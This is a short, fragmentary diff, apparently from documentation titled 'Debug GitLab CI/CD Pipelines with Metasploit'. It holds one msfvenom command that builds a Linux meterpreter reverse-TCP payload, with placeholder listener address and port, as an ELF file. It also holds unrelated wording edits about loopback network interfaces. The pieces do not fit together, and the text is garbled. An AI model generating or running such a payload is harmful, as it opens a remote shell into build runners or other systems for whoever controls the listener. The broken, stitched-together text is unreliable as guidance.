Debug GitLab CI/CD Pipelines with Metasploit

 msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > meterpreter.elf

-the first one to be a loopback
+common for the first one to be a loopback

-IP address after the loopback
+gets the first IP address after the loopback

 interface: